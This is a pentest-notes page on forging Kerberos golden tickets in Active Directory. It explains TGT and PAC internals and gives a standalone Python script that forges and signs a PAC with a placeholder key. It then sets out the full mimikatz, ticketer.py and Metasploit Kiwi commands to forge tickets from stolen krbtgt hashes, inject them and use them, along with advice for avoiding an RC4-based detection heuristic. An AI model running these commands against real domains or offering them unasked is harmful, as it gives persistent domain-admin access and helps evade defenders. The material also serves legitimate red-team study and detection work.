InfoSec Notes
Post Exploitation - Kerberos golden tickets

Overview

Kerberos is the authentication protocol used within Active Directory. It relies on tickets to identify users and grant access to domain resources. Kerberos implements two types of tickets, issued by two distinct services of the Key Distribution Center (KDC):

  • Ticket-Granting Ticket (TGT), obtained from the Authentication Service (AS)

  • Service tickets, obtained from the Ticket-Granting Service (TGS).

A TGT is generally requested by a user through a KRB_AS_REQ to the AS of the KDC during the login process on a Windows system joined to an Active Directory domain. TGTs are encrypted using one of the secrets of the domain's krbtgt account (the RC4 key, whose value is identical to the NTLM hash, or the AES 128/256-bit keys). After receiving the TGT in the KRB_AS_REP response from the KDC, the client keeps it in memory in the Kerberos Security Support Provider (SSP) of the Local Security Authority Subsystem Service (LSASS) process.

The user's authorization data is stored in the Privilege Attribute Certificate (PAC), carried in the encrypted part of the TGT and thus protected only by the krbtgt secret, and includes:

  • the Domain SID and the user's RID, whose combination forms the user's Security Identifier (SID);

  • the SIDs kept in the user's SIDHistory attribute (ExtraSids field of the PAC);

  • the GROUP_MEMBERSHIP_ARRAY, which contains the user's group memberships in the form of the groups' Relative IDs (RID).

Whenever a service ticket is requested (KRB_TGS_REQ), the KDC decrypts the TGT with the krbtgt secret, validates the PAC it contains, copies the PAC into the new service ticket, signs it with both a secret of the targeted service account (Server Signature, computed over the PAC) and a secret of the krbtgt account (KDC Signature, computed over the Server Signature), and finally encrypts the service ticket with one of the secrets of the targeted service account. Since the TGT and its PAC are protected by the krbtgt secret alone, whoever holds that secret can produce a TGT whose PAC the KDC will accept as genuine.

Golden tickets are TGTs forged with arbitrary authorization data: the specified username, group RIDs and extra SIDs are placed in the forged ticket's PAC, which is then signed and encrypted with the krbtgt secret. The golden ticket can be injected in the current user session and used to request service tickets directly from the TGS, without any prior KRB_AS_REQ. Note that domain controllers hardened against CVE-2021-42287 (KB5008380, November 2021, enforced by default since the July 2022 updates) additionally require the PAC to carry a PAC_REQUESTOR buffer whose SID matches an existing account: the username and RID chosen for the golden ticket must therefore belong to a real account of the domain, and current versions of mimikatz and ticketer.py include this buffer.

To generate a golden ticket, the following prerequisites are needed:

  • The fully qualified domain name and the SID of the targeted domain.

  • One of the secrets of the targeted domain's krbtgt account: either the RC4 key (the NTLM hash of the krbtgt password) or one of the AES 128/256-bit keys. These are typically obtained through a DCSync replication or an ntds.dit dump (refer to the Post Exploitation - ntds.dit dumping page).

Note that while the user account specified for the golden ticket must be a member of the targeted domain, the arbitrary SIDs added to the SID history of the forged ticket (ExtraSids field of the PAC) can come from other domains of the forest or from trusted forests. Within a forest, this is typically used to add the Enterprise Admins SID of the forest root domain (<ROOT_DOMAIN_SID>-519) to a ticket forged in a child domain. Across forest trusts, SID filtering strips the SIDs that do not belong to the trusted forest unless it has been explicitly disabled (refer to the Post Exploitation - Trusts hopping page).
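As an added example (not code from the original notes), the following Python script reproduces the PAC signing scheme described above for RC4-HMAC tickets, using only the standard library: it builds a minimal PACTYPE structure, computes the Server and KDC Signatures (KERB_CHECKSUM_HMAC_MD5, RFC 4757 section 4), verifies them the way a KDC would, and reads back the PAC_REQUESTOR buffer that hardened domain controllers match against the ticket's account. The krbtgt key, the domain SID and the contents of the PAC_LOGON_INFO buffer are constructed placeholders (the logon payload is not real NDR-encoded KERB_VALIDATION_INFO). The point it makes is that for a TGT the "service" is krbtgt itself, so the krbtgt secret alone yields both signatures, which is exactly why a golden ticket's arbitrary PAC is accepted, while any modification after signing is rejected.

```python
"""Added example, not from the original notes: build, sign and verify a Kerberos PAC the way a
golden ticket does (MS-PAC section 2.8, RFC 4757 section 4), standard library only. The krbtgt
key, the domain SID and the PAC_LOGON_INFO payload are constructed; the payload is an opaque
placeholder, not a real NDR-encoded KERB_VALIDATION_INFO."""
import hashlib
import hmac
import struct

PAC_LOGON_INFO, PAC_SERVER_CHECKSUM, PAC_PRIVSVR_CHECKSUM, PAC_REQUESTOR = 1, 6, 7, 18
KERB_CHECKSUM_HMAC_MD5 = 0xFFFFFF76  # checksum type (-138) used with RC4-HMAC keys
KERB_NON_KERB_CKSUM_SALT = 17        # key usage number for PAC checksums
SIG_LEN = 16                         # HMAC-MD5 output length

def hmac_md5_checksum(key: bytes, usage: int, data: bytes) -> bytes:
    """KERB_CHECKSUM_HMAC_MD5: Ksign = HMAC(K, "signaturekey\\0"); HMAC(Ksign, MD5(usage_le32 || data))."""
    ksign = hmac.new(key, b"signaturekey\x00", hashlib.md5).digest()
    return hmac.new(ksign, hashlib.md5(struct.pack("<I", usage) + data).digest(), hashlib.md5).digest()

def sid_to_bytes(sid: str) -> bytes:
    """'S-1-5-21-a-b-c-500' -> binary SID: revision, sub-authority count, 48-bit BE authority, LE sub-authorities."""
    parts = sid.split("-")
    subs = [int(p) for p in parts[3:]]
    return struct.pack("<BB", 1, len(subs)) + int(parts[2]).to_bytes(6, "big") + struct.pack("<%dI" % len(subs), *subs)

def bytes_to_sid(data: bytes) -> str:
    """Inverse of sid_to_bytes."""
    rev, count = data[0], data[1]
    subs = struct.unpack_from("<%dI" % count, data, 8)
    return "S-%d-%d-%s" % (rev, int.from_bytes(data[2:8], "big"), "-".join(str(s) for s in subs))

def build_pac(buffers) -> bytes:
    """PACTYPE: cBuffers, Version, one PAC_INFO_BUFFER (ulType, cbBufferSize, Offset) per buffer,
    followed by the buffer data, each 8-byte aligned."""
    offset, infos, payloads = 8 + 16 * len(buffers), [], []
    for ultype, data in buffers:
        infos.append(struct.pack("<IIQ", ultype, len(data), offset))
        payloads.append(data + b"\x00" * (-len(data) % 8))
        offset += len(payloads[-1])
    return struct.pack("<II", len(buffers), 0) + b"".join(infos) + b"".join(payloads)

def parse_pac(pac: bytes) -> dict:
    """Return {ulType: (offset, size)} for every PAC_INFO_BUFFER."""
    count = struct.unpack_from("<I", pac, 0)[0]
    return {t: (o, s) for t, s, o in (struct.unpack_from("<IIQ", pac, 8 + 16 * i) for i in range(count))}

def _with_signatures(pac: bytes, server_sig: bytes, kdc_sig: bytes) -> bytes:
    """Overwrite both Signature fields (they follow the 4-byte SignatureType of each PAC_SIGNATURE_DATA)."""
    out, bufs = bytearray(pac), parse_pac(pac)
    for ultype, sig in ((PAC_SERVER_CHECKSUM, server_sig), (PAC_PRIVSVR_CHECKSUM, kdc_sig)):
        off = bufs[ultype][0] + 4
        out[off:off + SIG_LEN] = sig
    return bytes(out)

def sign_pac(pac: bytes, server_key: bytes, krbtgt_key: bytes) -> bytes:
    """Server Signature: checksum of the whole PAC with both Signature fields zeroed, under the service key.
    KDC Signature: checksum of the Server Signature under the krbtgt key.
    For a TGT the service *is* krbtgt, so the krbtgt key alone yields both signatures."""
    zeroed = _with_signatures(pac, bytes(SIG_LEN), bytes(SIG_LEN))
    server_sig = hmac_md5_checksum(server_key, KERB_NON_KERB_CKSUM_SALT, zeroed)
    kdc_sig = hmac_md5_checksum(krbtgt_key, KERB_NON_KERB_CKSUM_SALT, server_sig)
    return _with_signatures(pac, server_sig, kdc_sig)

def verify_pac(pac: bytes, server_key: bytes, krbtgt_key: bytes) -> bool:
    """The verifier's check: recompute both checksums and compare them in constant time."""
    bufs = parse_pac(pac)
    srv, kdc = bufs[PAC_SERVER_CHECKSUM][0] + 4, bufs[PAC_PRIVSVR_CHECKSUM][0] + 4
    server_sig, kdc_sig = pac[srv:srv + SIG_LEN], pac[kdc:kdc + SIG_LEN]
    zeroed = _with_signatures(pac, bytes(SIG_LEN), bytes(SIG_LEN))
    return (hmac.compare_digest(server_sig, hmac_md5_checksum(server_key, KERB_NON_KERB_CKSUM_SALT, zeroed))
            and hmac.compare_digest(kdc_sig, hmac_md5_checksum(krbtgt_key, KERB_NON_KERB_CKSUM_SALT, server_sig)))

def pac_requestor_sid(pac: bytes) -> str:
    """SID in the PAC_REQUESTOR buffer, which hardened DCs (CVE-2021-42287) match against the ticket's account."""
    off, size = parse_pac(pac)[PAC_REQUESTOR]
    return bytes_to_sid(pac[off:off + size])

def forge_golden_pac(krbtgt_key: bytes, domain_sid: str, user_rid: int) -> bytes:
    """Forge a TGT PAC with arbitrary authorization data and sign it with nothing but the krbtgt key."""
    empty_sig = struct.pack("<I", KERB_CHECKSUM_HMAC_MD5) + bytes(SIG_LEN)
    logon_info = b"CONSTRUCTED LOGON INFO rid=%d groups=513,512,520,518,519" % user_rid  # placeholder payload
    pac = build_pac([(PAC_LOGON_INFO, logon_info), (PAC_SERVER_CHECKSUM, empty_sig),
                     (PAC_PRIVSVR_CHECKSUM, empty_sig), (PAC_REQUESTOR, sid_to_bytes("%s-%d" % (domain_sid, user_rid)))])
    return sign_pac(pac, krbtgt_key, krbtgt_key)

if __name__ == "__main__":
    KRBTGT_KEY = bytes.fromhex("00112233445566778899aabbccddeeff")  # constructed RC4 key (NT hash), not a real secret
    pac = forge_golden_pac(KRBTGT_KEY, "S-1-5-21-1111111111-2222222222-3333333333", 500)
    print("forged PAC accepted with the krbtgt key:", verify_pac(pac, KRBTGT_KEY, KRBTGT_KEY))
    print("PAC_REQUESTOR:", pac_requestor_sid(pac))
    tampered = bytearray(pac)
    tampered[parse_pac(pac)[PAC_LOGON_INFO][0]] ^= 0xFF  # flip one byte of the authorization data after signing
    print("PAC modified after signing accepted:", verify_pac(bytes(tampered), KRBTGT_KEY, KRBTGT_KEY))
```

For a service ticket the same sign_pac call would take the targeted service account's key as server_key and the krbtgt key for the KDC Signature, which is the distinction between a golden ticket (krbtgt key needed) and a silver ticket (only the service key needed for the Server Signature; the KDC Signature is not checked by the service unless PAC validation is enabled).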

Golden tickets generation

The mimikatz kerberos::golden module and Impacket's ticketer.py can be used to generate golden tickets. Forging the ticket with the krbtgt AES256 key rather than the RC4 key keeps it consistent with a domain where RC4 is otherwise unused: a TGT encrypted with RC4-HMAC (encryption type 0x17) in an AES-only environment is a common golden ticket detection heuristic.

The golden ticket's:

  • UserId (impersonated user's RID) can be specified using /id (mimikatz) or -user-id <USER_ID> (ticketer.py) and defaults to 500 (the built-in Administrator account).

  • GroupIds (impersonated group memberships) can be specified using /groups (mimikatz) or -groups <GROUP_RID | GROUP_RID1, ..., GROUP_RIDN> (ticketer.py) and defaults to 513, 512, 520, 518, 519 (Domain Users, Domain Admins, Group Policy Creator Owners, Schema Admins and Enterprise Admins).

  • ExtraSids (impersonated user's SID History) can be specified using /sids (mimikatz) or -extra-sid <EXTRA_SID | EXTRA_SID1, ..., EXTRA_SIDN> (ticketer.py).

# Retrieves the domain FQDN and SID (ActiveDirectory PowerShell module, from a domain-joined host).
Get-ADDomain | Format-Table DNSRoot, DomainSID

# [Windows] Golden ticket generation using mimikatz.
# With the "/ptt" option the generated ticket is directly injected in the current logon session.
# Otherwise the golden ticket is written to disk in the KRB_CRED format (KIRBI file, path settable with "/ticket").
mimikatz # kerberos::golden /user:<USERNAME> /domain:<DOMAIN_FQDN> /sid:<DOMAIN_SID> [/rc4:<KRBTGT_NTLM> | /aes128:<KRBTGT_AES128> | /aes256:<KRBTGT_AES256>] [/id:<USER_RID>] [/groups:<RID | RID_LIST>] [/sids:<EXTRA_SID | EXTRA_SIDS_LIST>] [/ptt | /ticket:<OUTPUT_KIRBI>]

# [Linux / Windows] Golden ticket generation using ticketer.py.
# The generated ticket is written to the current directory in the credential cache format (<USERNAME>.ccache).
ticketer.py -domain <DOMAIN_FQDN> -domain-sid <DOMAIN_SID> [-nthash <KRBTGT_NTLM> | -aesKey <KRBTGT_AES128 | KRBTGT_AES256>] <USERNAME>
ticketer.py -domain <DOMAIN_FQDN> -domain-sid <DOMAIN_SID> [-nthash <KRBTGT_NTLM> | -aesKey <KRBTGT_AES128 | KRBTGT_AES256>] -user-id <500 | USER_ID> -groups <GROUP_RID | GROUP_RID1, ..., GROUP_RIDN> -extra-sid <EXTRA_SID | EXTRA_SID1, ..., EXTRA_SIDN> <USERNAME>

mimikatz with Metasploit

mimikatz 2.0 is available in a meterpreter shell as the Kiwi extension.

The following command loads the extension in memory from a meterpreter shell: load kiwi

Once the module has been loaded, the golden_ticket_create command can be used to create a golden ticket:

golden_ticket_create -d '<FQDN_DOMAIN>' -s '<SID_DOMAIN>' -k '<KRBTGT_HASH>' -u '<USERNAME>' -t '<FULL_SAVE_PATH>'

Usage: golden_ticket_create [options]
OPTIONS:
    -d <opt>  FQDN of the target domain (required)
    -g <opt>  Comma-separated list of group identifiers to include (eg: 501,502)
    -h        Help banner
    -i <opt>  ID of the user to associate the ticket with
    -k <opt>  krbtgt domain user NTLM hash
    -s <opt>  SID of the domain
    -t <opt>  Local path of the file to store the ticket in (required)
    -u <opt>  Name of the user to create the ticket for (required)

A saved ticket can be loaded into the current session with kerberos_ticket_use, and all cached tickets flushed with kerberos_ticket_purge:

kerberos_ticket_use <FULL_SAVE_PATH>
kerberos_ticket_purge

Golden tickets usage (Pass-the-Ticket)

On Windows, golden tickets generated using mimikatz are automatically injected in the current logon session if the /ptt option is specified. Otherwise, an exported golden ticket (KIRBI file) can be injected using mimikatz "kerberos::ptt <TICKET_FILE_PATH>". The tickets held by the current session can be listed with the klist command.

On Linux, golden tickets in the credential cache (ccache) format are used by pointing the KRB5CCNAME environment variable at the ccache file, after which tools supporting Kerberos authentication, such as the Impacket utilities (with their -k -no-pass options), pick the ticket up. The attacking host must resolve the domain's FQDN (typically through the domain controller as DNS server, or entries in /etc/hosts) and targets must be addressed by hostname rather than IP address, otherwise the SPN of the requested service ticket will not match.

Refer to the [Active Directory] Kerberos tickets usage page for more information on techniques and tools to leverage golden tickets.

